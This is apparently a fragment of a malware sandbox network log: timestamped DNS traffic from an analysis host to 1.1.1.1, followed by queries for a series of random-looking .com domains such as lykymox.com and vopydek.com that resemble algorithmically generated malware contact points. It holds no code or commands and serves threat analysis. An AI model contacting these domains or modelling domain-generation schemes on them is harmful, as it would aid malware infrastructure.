                                                                                                                                                                                                            Nov 11, 2024 18:08:42.357786894 CET6325353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.358637094 CET5388853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.359215975 CET6228453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.367168903 CET53632531.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.368933916 CET53622841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.369425058 CET53538881.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.369833946 CET53632911.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.512492895 CET6022153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517250061 CET5813853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517644882 CET6060453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517855883 CET6044053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.519895077 CET6146153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.522033930 CET53602211.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.524005890 CET5903053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.525473118 CET5345853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.526659966 CET53606041.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.527251959 CET53581381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.529567957 CET53614611.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.533119917 CET53590301.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535084963 CET5309953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535593987 CET5270453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535959959 CET6076853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536499023 CET5317653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536669016 CET6026053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536825895 CET5834553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536968946 CET5904053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.537023067 CET6473653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.540128946 CET6084653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.541814089 CET6297353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.544702053 CET53531761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.544950962 CET53527041.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.544960976 CET53530991.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.545032024 CET5978253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.545090914 CET6173153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.546205044 CET53602601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.546335936 CET53583451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.549705982 CET53604401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.551342964 CET53629731.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.554276943 CET53597821.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.554507017 CET53647361.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.556694031 CET53534581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.560173035 CET5932153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.562290907 CET5002753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.563476086 CET5415453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.563695908 CET5095753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564162016 CET5410653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564349890 CET6407753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564526081 CET6374653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564680099 CET5966253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564857960 CET6293253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565150023 CET6333253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565417051 CET6060853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565588951 CET5875453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565743923 CET5249553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565891027 CET6169853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566062927 CET5286953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566236019 CET5638353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566304922 CET53607681.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566426039 CET5269253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566544056 CET6534453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.232562065 CET5664353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.234318018 CET53579311.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.237760067 CET53612941.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.240169048 CET53515731.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.241903067 CET53601621.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.241914034 CET53545641.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.241924047 CET53630141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242060900 CET6538053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242302895 CET5485853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242326975 CET53600381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242361069 CET53546401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242758989 CET53517581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242769957 CET53533811.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243045092 CET5851753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243139982 CET5066653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243261099 CET5744753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243616104 CET5527853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.244699955 CET5127353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.244884968 CET5678953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.244944096 CET6482953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.245770931 CET6105953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.245914936 CET53533721.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.249670982 CET53576441.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.250251055 CET53635331.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.251398087 CET53653801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.252587080 CET53552781.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.253510952 CET53506661.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.254491091 CET53512731.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.254530907 CET53548581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.256819963 CET53610591.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.258358955 CET5072953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.259268999 CET5229253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.259712934 CET5653153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.259974003 CET5140653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260090113 CET5228353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260152102 CET5111453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260313988 CET5863553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260458946 CET6194653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260611057 CET5228453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260611057 CET5022853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260678053 CET5593153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260869026 CET6283753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.261868954 CET53585171.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.263384104 CET6112853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.264115095 CET53579621.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.264214039 CET53566431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.264467001 CET5217353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.265358925 CET6124153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.268524885 CET53507291.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.269479990 CET53565311.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.270313025 CET53522921.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.270322084 CET53628371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.270488977 CET53502281.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.270534039 CET53514061.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.270874023 CET53511141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.271100044 CET53611281.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.271791935 CET53522831.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.271828890 CET53559311.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.272581100 CET53586351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.274180889 CET53574471.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.275891066 CET6014553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.276412010 CET53521731.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.276423931 CET53612411.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.276470900 CET53567891.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.276616096 CET53648291.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.279241085 CET53619461.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.293461084 CET53522841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.308059931 CET53601451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.145859003 CET5791453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.146260023 CET5049753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.148217916 CET5080353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.148437023 CET6454553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.155699015 CET53504971.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.157813072 CET5443653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.158106089 CET53645451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.158910036 CET53508031.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164499998 CET6465653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164509058 CET53579141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164693117 CET5534653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164855957 CET5905253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.168011904 CET53544361.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.175267935 CET53646561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.176153898 CET53553461.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.183043003 CET5869453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.183295965 CET4928253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.183820963 CET53590521.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.191498995 CET5597953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.195782900 CET6034053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.195782900 CET5341953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.196305037 CET5428153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.198610067 CET5500053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.198923111 CET5027653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.200453043 CET4950553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.200691938 CET5071853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.200891018 CET5291953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.201064110 CET6549553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.203133106 CET6399953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.203608990 CET5204053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.203818083 CET6197353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.204334021 CET5519153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.204834938 CET6464053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.206248045 CET5618853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.207268000 CET5251053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.207364082 CET53534191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.208548069 CET5058553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865114927 CET6501553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865319014 CET6036453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865838051 CET53627761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.871624947 CET53501331.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873116016 CET53624271.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873419046 CET53522931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873424053 CET5303753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.874150038 CET53584791.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.874953032 CET53525961.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.875430107 CET53606361.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.876161098 CET53650151.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.876173019 CET53547771.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.877188921 CET53557481.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.877198935 CET53603641.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.881617069 CET53546431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.882452011 CET6176253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.883162975 CET5272453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.883790970 CET53530371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.886507034 CET53515121.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.887875080 CET4926953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.893651962 CET53510381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.895323038 CET53492691.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.914482117 CET53617621.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.914716005 CET53527241.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258372068 CET6051953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258634090 CET6526053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258773088 CET5677153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259138107 CET6005153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259573936 CET5748953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259845018 CET5957653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260092974 CET6227253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260566950 CET5437253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260598898 CET5535053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.261190891 CET4977653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.266408920 CET53574891.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269279957 CET53652601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269311905 CET53622721.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269932985 CET53600511.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.271780968 CET53543721.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.271795988 CET53497761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.272649050 CET53567711.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.289105892 CET53605191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.290972948 CET53595761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.292593956 CET53553501.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.071819067 CET5493153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072045088 CET5648053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072098017 CET5152453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072320938 CET6036953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072480917 CET5865953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072658062 CET5494753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072757959 CET6355253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073030949 CET6031153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073059082 CET5871153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073371887 CET6356853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073371887 CET6295153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073668003 CET5807753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073688984 CET5078553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073976994 CET6054653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078263998 CET5011553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078283072 CET5835153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078500986 CET4956153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078671932 CET5748653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.079169989 CET5617753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.082118988 CET53515241.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.082134008 CET53586591.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083174944 CET53603111.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083204985 CET53587111.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083276033 CET53635521.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083292961 CET53507851.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.086327076 CET53549471.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.088217020 CET53574861.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.088229895 CET53495611.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.089378119 CET53501151.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.090313911 CET53583511.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.102423906 CET53564801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104063034 CET53603691.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104610920 CET53635681.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104624987 CET53629511.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105623960 CET53549311.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105634928 CET53580771.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105901957 CET53605461.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.111394882 CET53561771.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.527488947 CET4938853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532537937 CET5195053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532618999 CET5780253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532763004 CET4945753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.539993048 CET5636553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.540082932 CET5947553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.540385962 CET6452753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.543850899 CET53519501.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544475079 CET5918353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544641972 CET53494571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544966936 CET53578021.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.546242952 CET6353253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.547792912 CET5935553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.550282955 CET53563651.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.550587893 CET53594751.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.551038027 CET53645271.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.552020073 CET6141453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.552654982 CET5356553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553731918 CET6116453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553750038 CET6405353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553946018 CET5753953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.555237055 CET5704953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.556212902 CET53635321.1.1.1192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.983777046 CET192.168.2.91.1.1.10x44fdStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.984375954 CET192.168.2.91.1.1.10x705bStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.989244938 CET192.168.2.91.1.1.10x34acStandard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.041429043 CET192.168.2.91.1.1.10x4701Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.056638956 CET192.168.2.91.1.1.10xdcdbStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.057015896 CET192.168.2.91.1.1.10x5cfdStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.058934927 CET192.168.2.91.1.1.10x211Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.065152884 CET192.168.2.91.1.1.10x6840Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.127448082 CET192.168.2.91.1.1.10xe367Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.127829075 CET192.168.2.91.1.1.10xa9beStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.144922018 CET192.168.2.91.1.1.10x32d0Standard query (0)vocykem.comA (IP address)IN (0x0001)false
